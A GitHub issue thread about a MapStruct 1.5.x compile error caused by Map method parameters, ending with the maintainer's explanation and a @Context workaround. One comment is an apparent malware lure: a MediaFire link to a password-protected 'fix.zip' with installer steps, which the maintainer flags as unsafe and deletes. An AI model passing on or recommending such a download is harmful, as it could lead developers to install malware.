### ISSUE TITLE
Mapstruct 1.5.x : Mapping parameter of type Map<?,?> generates issue 

### ISSUE THREAD

**Issue by jesusherencia** [mapstruct/mapstruct#3684]
### Expected behavior

Mapstruct should generate implementation of Mapper at compilation. Version 1.4.2 doesn't have this issue.

### Actual behavior

When a mapping method has a parameter of type Map<>, it throws an error at compilation.

This is my source code :

```xml
<dependency>
   <groupId>org.mapstruct</groupId>
   <artifactId>mapstruct</artifactId>
   <version>1.5.5.Final</version>
</dependency>
```

```java
@Data
public class DestinationTO {
...
    private String arg1;
    private String someField;
...
}
```

```java
@Data
public class SourceTO {
...
    private String someField;
...
}
```

```java
@Mapper(componentModel = "spring",
    injectionStrategy = InjectionStrategy.CONSTRUCTOR
)
public interface Arg1TOMapper {
...
    @Mapping(target = "arg1", ignore = true)
    DestinationTO mapSource(SourceTO source,
                               ...
                               Map<String, String> arg1,
                               ...);

    @AfterMapping
    default void mapArg1(final SourceTO source,
                               ...
                               final Map<String, String> arg1,
                               ...
                               @MappingTarget final DestinationTO destination ) {
        ...
    }
...
```

At compilation it generates the following error : 

`Several possible source properties for target property "someField".`

Note : This only happens at version 1.5.x, version 1.4.2 compilates and generates source without a problem.

### Steps to reproduce the problem

I use maven : 
mvn clean install

### MapStruct Version

1.5.5

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by filiphr** [comment]
@jesusherencia can you please create a github repository with the code. Downloading files like that does not look safe to me (that's why I also deleted the comment)

**Comment by jesusherencia** [comment]
> @jesusherencia can you please create a github repository with the code. Downloading files like that does not look safe to me (that's why I also deleted the comment)

I didn't add any links, it was somebody else that added a comment with a link.

**Comment by filiphr** [comment]
I appologise @jesusherencia. I didn't see properly.

Looking at the issue again it does not look like we need code to reproduce it.

What I find strange is why would you get

>Several possible source properties for target property "arg1".

When you have

```java
@Mapping(target = "arg1", ignore = true)
```

Are you sure that the error is on the method you shared?

Additionally, can you perhaps try with 1.6.0? There have been numerous fixes in there.

**Comment by jesusherencia** [comment]
@filiphr Actual implementation has other method parameters (including List<>).
When I remove the Map<> parameter everything works fine.
I tried with version 1.6, I got other issues. I will stay with version 1.5 as it seems to be the suitable last version to use in production.

**Comment by filiphr** [comment]
>Actual implementation has other method parameters (including List<>).
>When I remove the Map<> parameter everything works fine.

OK, we will check what is happening, but I think that the example you shared will work properly.

>I tried with version 1.6, I got other issues. 

Would be good if you can share in some other issue what kind of issues you are having. This way we can work on fixing those.

**Comment by filiphr** [comment]
Thanks @zyberzebra. The error you are getting is OKish. What I am confused is how can @jesusherencia get the error when the target property is explicitly ignored.

So if you have `@Mapping(target = "someField", ignore = true)` then you should not have

```
java: Several possible source properties for target property "someField".
```

@jesusherencia are you able to provide a minimal example that we can run and see the problem>

**Comment by jesusherencia** [comment]
@filiphr I created a public repository, you can use it to reproduce the issue, mvn clean install.
https://github.com/jesusherencia/Mapstruct_Test.git

**Comment by filiphr** [comment]
OK I see what the issue is. Since 1.5 we started supported mapping `Map<String, ?>` as a bean mapping. This means that for something like:

```java
@Mapping(target = "arg1", ignore = true)
DestinationTO mapSource(SourceTO source,
                            Map<String, List<String>> arg1);
```

for the `someField` from `DestinationTO` there are 2 possible sources. One is `SourceTO` and the other is `Map<String, List<String>>`. If you are not using the `Map<String, ?>` source parameter as a proper source parameter then I would suggest using `@Context` to pass it to lifecycle `@AfterMapping` and / or `@BeforeMapping`.
